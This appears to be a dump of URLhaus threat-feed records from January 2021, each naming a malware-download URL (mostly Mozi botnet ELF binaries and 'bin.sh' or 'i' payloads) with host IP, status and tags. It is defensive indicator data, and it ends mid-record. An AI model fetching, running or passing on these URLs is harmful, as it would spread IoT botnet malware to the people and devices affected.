-{"id":"961387","urlhaus_reference":"https://urlhaus.abuse.ch/url/961387/","url":"http://113.239.210.87:50195/Mozi.a","url_status":"online","host":"113.239.210.87","date_added":"2021-01-14 20:34:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961388","urlhaus_reference":"https://urlhaus.abuse.ch/url/961388/","url":"http://115.62.159.229:52447/Mozi.a","url_status":"online","host":"115.62.159.229","date_added":"2021-01-14 20:34:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961389","urlhaus_reference":"https://urlhaus.abuse.ch/url/961389/","url":"http://113.90.237.126:56321/Mozi.m","url_status":"online","host":"113.90.237.126","date_added":"2021-01-14 20:34:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961390","urlhaus_reference":"https://urlhaus.abuse.ch/url/961390/","url":"http://115.219.146.151:54620/Mozi.m","url_status":"online","host":"115.219.146.151","date_added":"2021-01-14 20:34:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961386","urlhaus_reference":"https://urlhaus.abuse.ch/url/961386/","url":"http://60.7.65.79:52064/Mozi.a","url_status":"online","host":"60.7.65.79","date_added":"2021-01-14 20:23:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961385","urlhaus_reference":"https://urlhaus.abuse.ch/url/961385/","url":"http://59.93.16.88:47401/Mozi.m","url_status":"offline","host":"59.93.16.88","date_added":"2021-01-14 20:22:06 
UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961382","urlhaus_reference":"https://urlhaus.abuse.ch/url/961382/","url":"http://59.95.174.61:46527/Mozi.m","url_status":"online","host":"59.95.174.61","date_added":"2021-01-14 20:22:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961383","urlhaus_reference":"https://urlhaus.abuse.ch/url/961383/","url":"http://59.93.21.239:38132/Mozi.m","url_status":"offline","host":"59.93.21.239","date_added":"2021-01-14 20:22:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961384","urlhaus_reference":"https://urlhaus.abuse.ch/url/961384/","url":"http://45.176.111.252:59015/Mozi.m","url_status":"online","host":"45.176.111.252","date_added":"2021-01-14 20:22:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961379","urlhaus_reference":"https://urlhaus.abuse.ch/url/961379/","url":"http://222.137.176.198:59454/Mozi.m","url_status":"online","host":"222.137.176.198","date_added":"2021-01-14 20:22:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961380","urlhaus_reference":"https://urlhaus.abuse.ch/url/961380/","url":"http://42.232.233.146:37883/Mozi.m","url_status":"online","host":"42.232.233.146","date_added":"2021-01-14 20:22:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} 
-{"id":"961381","urlhaus_reference":"https://urlhaus.abuse.ch/url/961381/","url":"http://42.234.255.164:55209/Mozi.m","url_status":"online","host":"42.234.255.164","date_added":"2021-01-14 20:22:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961378","urlhaus_reference":"https://urlhaus.abuse.ch/url/961378/","url":"http://182.59.96.114:41062/Mozi.m","url_status":"online","host":"182.59.96.114","date_added":"2021-01-14 20:21:33 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961377","urlhaus_reference":"https://urlhaus.abuse.ch/url/961377/","url":"http://211.226.185.30:60380/i","url_status":"online","host":"211.226.185.30","date_added":"2021-01-14 20:21:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","arm","elf"]} -{"id":"961375","urlhaus_reference":"https://urlhaus.abuse.ch/url/961375/","url":"http://195.87.190.106:54796/Mozi.m","url_status":"online","host":"195.87.190.106","date_added":"2021-01-14 20:21:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961376","urlhaus_reference":"https://urlhaus.abuse.ch/url/961376/","url":"http://183.188.139.70:35251/Mozi.m","url_status":"online","host":"183.188.139.70","date_added":"2021-01-14 20:21:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961373","urlhaus_reference":"https://urlhaus.abuse.ch/url/961373/","url":"http://117.222.173.201:50562/Mozi.m","url_status":"offline","host":"117.222.173.201","date_added":"2021-01-14 20:20:06 
UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961374","urlhaus_reference":"https://urlhaus.abuse.ch/url/961374/","url":"http://117.215.248.158:33445/Mozi.m","url_status":"online","host":"117.215.248.158","date_added":"2021-01-14 20:20:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961370","urlhaus_reference":"https://urlhaus.abuse.ch/url/961370/","url":"http://120.85.197.148:60280/Mozi.a","url_status":"online","host":"120.85.197.148","date_added":"2021-01-14 20:20:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961371","urlhaus_reference":"https://urlhaus.abuse.ch/url/961371/","url":"http://182.126.66.149:46386/Mozi.m","url_status":"online","host":"182.126.66.149","date_added":"2021-01-14 20:20:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961372","urlhaus_reference":"https://urlhaus.abuse.ch/url/961372/","url":"http://182.113.4.64:60288/Mozi.m","url_status":"online","host":"182.113.4.64","date_added":"2021-01-14 20:20:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961368","urlhaus_reference":"https://urlhaus.abuse.ch/url/961368/","url":"http://113.116.144.14:49731/Mozi.a","url_status":"online","host":"113.116.144.14","date_added":"2021-01-14 20:19:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} 
-{"id":"961369","urlhaus_reference":"https://urlhaus.abuse.ch/url/961369/","url":"http://115.56.186.224:38837/Mozi.a","url_status":"online","host":"115.56.186.224","date_added":"2021-01-14 20:19:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961366","urlhaus_reference":"https://urlhaus.abuse.ch/url/961366/","url":"http://115.48.159.43:37814/Mozi.m","url_status":"online","host":"115.48.159.43","date_added":"2021-01-14 20:19:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961367","urlhaus_reference":"https://urlhaus.abuse.ch/url/961367/","url":"http://115.50.233.247:47507/Mozi.m","url_status":"online","host":"115.50.233.247","date_added":"2021-01-14 20:19:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961365","urlhaus_reference":"https://urlhaus.abuse.ch/url/961365/","url":"http://115.58.39.251:47140/i","url_status":"online","host":"115.58.39.251","date_added":"2021-01-14 20:18:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]} -{"id":"961363","urlhaus_reference":"https://urlhaus.abuse.ch/url/961363/","url":"http://42.224.170.54:41514/Mozi.a","url_status":"online","host":"42.224.170.54","date_added":"2021-01-14 20:10:11 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961364","urlhaus_reference":"https://urlhaus.abuse.ch/url/961364/","url":"http://42.235.100.87:58748/Mozi.m","url_status":"online","host":"42.235.100.87","date_added":"2021-01-14 20:10:11 
UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961362","urlhaus_reference":"https://urlhaus.abuse.ch/url/961362/","url":"http://175.168.229.209:51183/Mozi.m","url_status":"online","host":"175.168.229.209","date_added":"2021-01-14 20:10:09 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961361","urlhaus_reference":"https://urlhaus.abuse.ch/url/961361/","url":"http://182.119.164.30:42104/Mozi.m","url_status":"online","host":"182.119.164.30","date_added":"2021-01-14 20:10:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961354","urlhaus_reference":"https://urlhaus.abuse.ch/url/961354/","url":"http://42.224.52.56:53130/Mozi.m","url_status":"online","host":"42.224.52.56","date_added":"2021-01-14 20:10:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961355","urlhaus_reference":"https://urlhaus.abuse.ch/url/961355/","url":"http://58.255.134.250:57768/Mozi.m","url_status":"online","host":"58.255.134.250","date_added":"2021-01-14 20:10:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961356","urlhaus_reference":"https://urlhaus.abuse.ch/url/961356/","url":"http://42.230.54.138:34541/Mozi.m","url_status":"online","host":"42.230.54.138","date_added":"2021-01-14 20:10:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} 
-{"id":"961357","urlhaus_reference":"https://urlhaus.abuse.ch/url/961357/","url":"http://219.156.51.117:51344/Mozi.a","url_status":"online","host":"219.156.51.117","date_added":"2021-01-14 20:10:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961358","urlhaus_reference":"https://urlhaus.abuse.ch/url/961358/","url":"http://42.234.186.111:40084/Mozi.m","url_status":"online","host":"42.234.186.111","date_added":"2021-01-14 20:10:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961359","urlhaus_reference":"https://urlhaus.abuse.ch/url/961359/","url":"http://58.249.73.109:60457/Mozi.m","url_status":"online","host":"58.249.73.109","date_added":"2021-01-14 20:10:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961360","urlhaus_reference":"https://urlhaus.abuse.ch/url/961360/","url":"http://27.41.5.197:34906/Mozi.a","url_status":"online","host":"27.41.5.197","date_added":"2021-01-14 20:10:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961353","urlhaus_reference":"https://urlhaus.abuse.ch/url/961353/","url":"http://176.113.161.71:59847/Mozi.m","url_status":"online","host":"176.113.161.71","date_added":"2021-01-14 20:10:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961352","urlhaus_reference":"https://urlhaus.abuse.ch/url/961352/","url":"http://122.165.112.82:47873/Mozi.m","url_status":"offline","host":"122.165.112.82","date_added":"2021-01-14 20:09:00 
UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961349","urlhaus_reference":"https://urlhaus.abuse.ch/url/961349/","url":"http://125.44.12.28:48645/Mozi.m","url_status":"online","host":"125.44.12.28","date_added":"2021-01-14 20:05:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961350","urlhaus_reference":"https://urlhaus.abuse.ch/url/961350/","url":"http://120.56.112.117:36524/Mozi.a","url_status":"online","host":"120.56.112.117","date_added":"2021-01-14 20:05:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961351","urlhaus_reference":"https://urlhaus.abuse.ch/url/961351/","url":"http://117.192.227.212:38726/Mozi.m","url_status":"online","host":"117.192.227.212","date_added":"2021-01-14 20:05:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961345","urlhaus_reference":"https://urlhaus.abuse.ch/url/961345/","url":"http://120.85.209.116:41149/Mozi.m","url_status":"online","host":"120.85.209.116","date_added":"2021-01-14 20:05:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961346","urlhaus_reference":"https://urlhaus.abuse.ch/url/961346/","url":"http://123.4.140.121:46993/Mozi.m","url_status":"online","host":"123.4.140.121","date_added":"2021-01-14 20:05:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} 
-{"id":"961347","urlhaus_reference":"https://urlhaus.abuse.ch/url/961347/","url":"http://125.47.246.253:39190/Mozi.m","url_status":"online","host":"125.47.246.253","date_added":"2021-01-14 20:05:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961348","urlhaus_reference":"https://urlhaus.abuse.ch/url/961348/","url":"http://115.59.222.67:48344/Mozi.a","url_status":"online","host":"115.59.222.67","date_added":"2021-01-14 20:05:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961344","urlhaus_reference":"https://urlhaus.abuse.ch/url/961344/","url":"http://125.133.102.126:58427/bin.sh","url_status":"online","host":"125.133.102.126","date_added":"2021-01-14 20:04:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","arm","elf"]} -{"id":"961343","urlhaus_reference":"https://urlhaus.abuse.ch/url/961343/","url":"http://115.55.179.98:41921/i","url_status":"online","host":"115.55.179.98","date_added":"2021-01-14 20:02:03 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]} -{"id":"961342","urlhaus_reference":"https://urlhaus.abuse.ch/url/961342/","url":"http://115.58.39.251:47140/bin.sh","url_status":"online","host":"115.58.39.251","date_added":"2021-01-14 19:55:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]} -{"id":"961341","urlhaus_reference":"https://urlhaus.abuse.ch/url/961341/","url":"http://61.3.126.151:34789/Mozi.m","url_status":"online","host":"61.3.126.151","date_added":"2021-01-14 19:52:33 
UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961340","urlhaus_reference":"https://urlhaus.abuse.ch/url/961340/","url":"http://59.94.182.91:37634/Mozi.m","url_status":"online","host":"59.94.182.91","date_added":"2021-01-14 19:52:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961339","urlhaus_reference":"https://urlhaus.abuse.ch/url/961339/","url":"http://58.249.22.65:41636/Mozi.m","url_status":"online","host":"58.249.22.65","date_added":"2021-01-14 19:52:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961338","urlhaus_reference":"https://urlhaus.abuse.ch/url/961338/","url":"http://222.141.10.143:32907/Mozi.m","url_status":"online","host":"222.141.10.143","date_added":"2021-01-14 19:51:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961336","urlhaus_reference":"https://urlhaus.abuse.ch/url/961336/","url":"http://27.198.22.182:57568/Mozi.a","url_status":"online","host":"27.198.22.182","date_added":"2021-01-14 19:51:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961337","urlhaus_reference":"https://urlhaus.abuse.ch/url/961337/","url":"http://42.224.136.106:40740/Mozi.m","url_status":"online","host":"42.224.136.106","date_added":"2021-01-14 19:51:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} 
-{"id":"961331","urlhaus_reference":"https://urlhaus.abuse.ch/url/961331/","url":"http://42.224.41.9:35927/Mozi.m","url_status":"online","host":"42.224.41.9","date_added":"2021-01-14 19:51:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961332","urlhaus_reference":"https://urlhaus.abuse.ch/url/961332/","url":"http://39.77.229.65:55558/Mozi.m","url_status":"online","host":"39.77.229.65","date_added":"2021-01-14 19:51:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961333","urlhaus_reference":"https://urlhaus.abuse.ch/url/961333/","url":"http://27.209.112.112:60558/Mozi.m","url_status":"online","host":"27.209.112.112","date_added":"2021-01-14 19:51:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961334","urlhaus_reference":"https://urlhaus.abuse.ch/url/961334/","url":"http://222.139.17.39:59624/Mozi.m","url_status":"online","host":"222.139.17.39","date_added":"2021-01-14 19:51:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961335","urlhaus_reference":"https://urlhaus.abuse.ch/url/961335/","url":"http://42.230.100.168:39386/Mozi.m","url_status":"online","host":"42.230.100.168","date_added":"2021-01-14 19:51:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961322","urlhaus_reference":"https://urlhaus.abuse.ch/url/961322/","url":"http://182.121.78.100:46289/Mozi.m","url_status":"online","host":"182.121.78.100","date_added":"2021-01-14 19:50:06 
UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961323","urlhaus_reference":"https://urlhaus.abuse.ch/url/961323/","url":"http://139.190.238.2:34951/Mozi.m","url_status":"offline","host":"139.190.238.2","date_added":"2021-01-14 19:50:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961324","urlhaus_reference":"https://urlhaus.abuse.ch/url/961324/","url":"http://186.33.122.75:47594/Mozi.m","url_status":"online","host":"186.33.122.75","date_added":"2021-01-14 19:50:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961325","urlhaus_reference":"https://urlhaus.abuse.ch/url/961325/","url":"http://182.121.32.64:55792/Mozi.m","url_status":"online","host":"182.121.32.64","date_added":"2021-01-14 19:50:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961326","urlhaus_reference":"https://urlhaus.abuse.ch/url/961326/","url":"http://123.9.207.172:35271/Mozi.m","url_status":"online","host":"123.9.207.172","date_added":"2021-01-14 19:50:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961327","urlhaus_reference":"https://urlhaus.abuse.ch/url/961327/","url":"http://186.33.122.231:36300/Mozi.m","url_status":"offline","host":"186.33.122.231","date_added":"2021-01-14 19:50:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} 
-{"id":"961328","urlhaus_reference":"https://urlhaus.abuse.ch/url/961328/","url":"http://182.121.128.242:60680/Mozi.m","url_status":"online","host":"182.121.128.242","date_added":"2021-01-14 19:50:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961329","urlhaus_reference":"https://urlhaus.abuse.ch/url/961329/","url":"http://175.172.66.144:51132/Mozi.a","url_status":"online","host":"175.172.66.144","date_added":"2021-01-14 19:50:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961330","urlhaus_reference":"https://urlhaus.abuse.ch/url/961330/","url":"http://182.116.99.242:39049/Mozi.m","url_status":"online","host":"182.116.99.242","date_added":"2021-01-14 19:50:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961321","urlhaus_reference":"https://urlhaus.abuse.ch/url/961321/","url":"http://117.248.62.107:57455/Mozi.m","url_status":"online","host":"117.248.62.107","date_added":"2021-01-14 19:49:12 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961320","urlhaus_reference":"https://urlhaus.abuse.ch/url/961320/","url":"http://117.222.172.10:32823/Mozi.m","url_status":"online","host":"117.222.172.10","date_added":"2021-01-14 19:49:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961318","urlhaus_reference":"https://urlhaus.abuse.ch/url/961318/","url":"http://101.20.171.255:44103/Mozi.a","url_status":"online","host":"101.20.171.255","date_added":"2021-01-14 19:49:05 
UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961319","urlhaus_reference":"https://urlhaus.abuse.ch/url/961319/","url":"http://117.211.62.72:36257/Mozi.m","url_status":"offline","host":"117.211.62.72","date_added":"2021-01-14 19:49:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961317","urlhaus_reference":"https://urlhaus.abuse.ch/url/961317/","url":"http://115.55.179.98:41921/bin.sh","url_status":"online","host":"115.55.179.98","date_added":"2021-01-14 19:45:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]} -{"id":"961316","urlhaus_reference":"https://urlhaus.abuse.ch/url/961316/","url":"http://182.113.226.63:50971/i","url_status":"online","host":"182.113.226.63","date_added":"2021-01-14 19:44:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]} -{"id":"961315","urlhaus_reference":"https://urlhaus.abuse.ch/url/961315/","url":"http://59.96.39.120:56339/Mozi.m","url_status":"offline","host":"59.96.39.120","date_added":"2021-01-14 19:36:13 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961314","urlhaus_reference":"https://urlhaus.abuse.ch/url/961314/","url":"http://221.15.198.146:52551/Mozi.m","url_status":"online","host":"221.15.198.146","date_added":"2021-01-14 19:36:09 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} 
-{"id":"961312","urlhaus_reference":"https://urlhaus.abuse.ch/url/961312/","url":"http://182.126.93.114:35942/Mozi.m","url_status":"online","host":"182.126.93.114","date_added":"2021-01-14 19:36:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961313","urlhaus_reference":"https://urlhaus.abuse.ch/url/961313/","url":"http://188.19.182.164:39636/Mozi.a","url_status":"online","host":"188.19.182.164","date_added":"2021-01-14 19:36:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961310","urlhaus_reference":"https://urlhaus.abuse.ch/url/961310/","url":"http://59.0.6.131:53548/Mozi.m","url_status":"offline","host":"59.0.6.131","date_added":"2021-01-14 19:36:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961311","urlhaus_reference":"https://urlhaus.abuse.ch/url/961311/","url":"http://45.160.145.247:40967/Mozi.m","url_status":"online","host":"45.160.145.247","date_added":"2021-01-14 19:36:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961309","urlhaus_reference":"https://urlhaus.abuse.ch/url/961309/","url":"http://186.33.104.195:49471/Mozi.m","url_status":"online","host":"186.33.104.195","date_added":"2021-01-14 19:36:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961302","urlhaus_reference":"https://urlhaus.abuse.ch/url/961302/","url":"http://42.224.172.5:43937/Mozi.m","url_status":"online","host":"42.224.172.5","date_added":"2021-01-14 19:36:05 
